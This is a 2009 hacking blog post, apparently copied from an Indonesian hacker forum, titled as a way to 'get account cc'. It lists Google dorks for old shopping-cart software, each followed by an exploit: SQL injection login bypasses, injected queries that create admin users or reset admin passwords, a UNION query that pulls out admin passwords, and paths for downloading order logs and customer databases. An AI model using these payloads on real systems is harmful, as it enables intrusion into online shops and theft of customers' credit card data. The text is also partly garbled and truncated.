Saturday, 08.24.2019, 8:25 AM
Main | Publisher | Registration | Login
Site menu
Section categories
Trick Blog [9]
All About Computer and Network [3]
Hacking [22]
Do you know? [3]
Zona Religi [5]
Belajar Pemrograman [0]
My Diary [1]
My Playlist

My YM Pinbox

Powered by:

Total online: 1
Guests: 1
Users: 0
Main » Articles » Hacking

How to get account cc
google dork :--> allinurl:/cart32.exe/
target looks :-->
chage NoItemFound whit error
When we found Page error dig installation information beneath it, meant us was successful!
If shares this was gotten list file the format/the suffix.C32 significant in site.Gotten file contained the data cc
Copy some file.C32 was or all of them to notepad or the program text the other editor.
The substitute string url tsb.To like this:
paste one by one, file.C32 at the end url has been modified earlier, with the format

google dork :--> inurl:"/cart.php?m="
target looks lile :-->
exploit: chage cart.php?m=view to /admin
target whit exploit :-->
Usename : 'or"="
Password : 'or"="

google dork :--> allinurlroddetail.asp?prod
target looks like :--> (big leters and numbers )
exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
target whit exploit :-->

google dork :--> allinurl: /cgi-local/shopper.cgi
target looks like :-->
exploit :--> ...&template=order.log
target whit exploit :-->

google dork :--> allinurl: Lobby.asp
target looks like :-->
exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
target whit exploit :-->

google dork :--> allinurl:/vpasp/shopsearch.asp
when u find a target put this in search box
Keyword=&category=5); insert into tbluser (fldusername) values
Keyword=&category=5); update tbluser set fldpassword='' where
Keyword=&category=3); update tbluser set fldaccess='1' where
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where

login page: http://xxxxxxx/vpasp/shopadmin.asp

google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
target looks like :-->
exploit :--> ... ion%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
if this is not working try this ends
after finding user and pass go to login page:

google dork :--> allinurl:/shopadmin.asp
target looks like :-->
user : 'or'1
pass : 'or'1

9- :--> allinurl:/store/index.cgi/page=
target looks like :-->
exploit :--> ../admin/files/order.log
target whit exploit :-->

10-> allinurl:/metacart/
target looks like :-->
exploit :--> /database/metacart.mdb
target whit exploit :-->
11-> allinurl:/DCShop/
target looks like :-->
exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
target whit exploit :--> or

12-> allinurl:/shop/category.asp/catid=
target looks like :-->
exploit :--> /admin/dbsetup.asp
target whit exploit :-->
after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
target for dl the data base :--> (dosent need to be like this)
in db look for access to find pass and user of shop admins.

13-> allinurl:/commercesql/
target looks like :-->
exploit :--> cgi-bin/commercesql/index.cgi?page=
target whit exploit admin config :--> ...
target whit exploit admin manager :-->
target whit exploit order.log :-->

14-> allinurl:/eshop/
target looks like :-->
exploit :-->/cg-bin/eshop/database/order.mdb
target whit exploit :-->
after dl the db look at access for user and password !!

Source: Indonesian Newbie Hacker

Category: Hacking | Added by: neo-gabriel (08.09.2009)
Views: 22462 | Comments: 1 | Rating: 0.0/0 |
Total comments: 0
Name *:
Email *:
Code *:
Login form
My YM Status

Flag Counter
free counters
Silakan Berteriak!!
Link Back ya,
My Friends

Copyright Neo-Gabriel © 2019